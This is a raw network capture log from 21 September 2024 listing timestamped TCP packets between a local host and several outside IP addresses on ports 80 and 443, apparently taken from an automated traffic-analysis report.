Sep 21, 2024 14:48:10.763689995 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763700008 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763705969 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763717890 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763722897 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763756037 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763758898 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763761044 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763768911 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763773918 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763777971 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763822079 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763847113 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763853073 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763879061 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763884068 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763890028 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763895988 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763900995 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763915062 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763936996 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763969898 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763977051 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763988018 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763993979 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.764027119 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.764039040 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.764357090 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.764369965 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.764377117 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.764381886 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.764403105 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.764408112 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.764415026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.764417887 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.764420986 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.764441967 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.764478922 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.768038988 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768181086 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768212080 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768218994 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768224955 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768249035 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768260956 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768265963 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768279076 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768292904 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768309116 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768316031 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768317938 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768327951 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768358946 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768378019 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768394947 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768402100 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768413067 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768419981 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768425941 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768457890 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768481970 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768490076 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768507004 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768512964 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768518925 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768521070 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768524885 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768533945 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768542051 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768573999 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768573999 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768630981 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768636942 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768646955 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768651962 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768657923 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768662930 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768668890 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768698931 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768698931 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768721104 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768733025 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768757105 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768763065 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768811941 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768817902 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768829107 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768843889 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768843889 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768857956 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768893957 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768899918 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768906116 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768908978 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768979073 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768985033 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.768986940 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.768996954 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769042969 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769042969 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769066095 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769072056 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769083023 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769088984 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769112110 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769117117 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769123077 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769135952 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769141912 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769141912 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769141912 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769165039 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769171000 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769176960 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769182920 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769192934 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769211054 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769359112 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769365072 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769376040 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769392014 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769403934 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769423008 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769438028 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769443989 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769448996 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769454002 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769463062 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769469976 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769479990 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769493103 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769499063 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769507885 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769514084 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769527912 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769534111 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769535065 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769542933 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769546986 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769578934 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769594908 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769594908 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769603014 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769608021 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769613028 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769623041 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769629955 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769643068 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769681931 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769890070 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769896030 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769906998 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769912958 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769917965 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769925117 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.769948959 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769959927 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.769969940 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.770059109 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770065069 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770073891 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770080090 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770085096 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770090103 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770095110 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770101070 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770103931 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.770107031 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770113945 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770119905 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770121098 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.770124912 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770131111 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770140886 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.770167112 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.770198107 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770204067 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770215034 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770220041 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770226002 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770231009 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770236015 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770241976 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770246983 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.770248890 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770268917 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.770281076 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.770469904 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770488024 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.770514011 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.770596027 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770602942 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770607948 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770615101 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770620108 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770626068 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770631075 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770642996 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.770652056 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.770718098 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.779242992 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.779340982 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.786964893 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.786972046 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.786989927 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.786994934 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.786999941 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787005901 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787013054 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787018061 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787050009 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.787065029 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787071943 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787084103 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787108898 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787115097 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787115097 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.787115097 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.787125111 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.787163019 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.787233114 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787240028 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787280083 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.787308931 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787314892 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787327051 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787332058 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787343025 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787355900 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.787373066 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.787422895 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787431002 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.787476063 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.788075924 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788136959 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788150072 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788161039 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788167000 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788199902 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.788211107 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788216114 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.788217068 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788228989 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788263083 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.788309097 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788315058 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788326025 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788331032 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788341999 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788357973 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.788369894 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788372040 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.788392067 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.788424015 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.788438082 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788444996 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788486958 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.788564920 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788570881 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788582087 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788588047 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788614988 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.788626909 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.788660049 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788674116 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788685083 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788691044 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788716078 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.788728952 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.788742065 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788748980 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788764000 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788769960 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788795948 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.788808107 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.788965940 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788971901 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788983107 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788988113 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.788995028 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789000988 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789016008 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.789031982 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.789050102 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.789077997 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789089918 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789096117 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789100885 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789107084 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789112091 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789118052 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789124012 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.789124012 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789145947 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.789194107 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.789272070 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789278030 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789288998 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789294958 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789320946 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.789324999 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789331913 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789334059 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.789339066 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789376974 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.789387941 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.789443016 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789449930 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789459944 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789465904 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789472103 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789477110 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789494038 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789495945 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.789530039 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.789539099 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.789633989 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789733887 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789740086 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789755106 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789762020 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789767981 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789778948 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789786100 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.789787054 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.789820910 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.800159931 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.800355911 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.800940037 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.801016092 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.801491022 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.801557064 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.802249908 CEST	443	49726	162.241.61.218	192.168.2.9
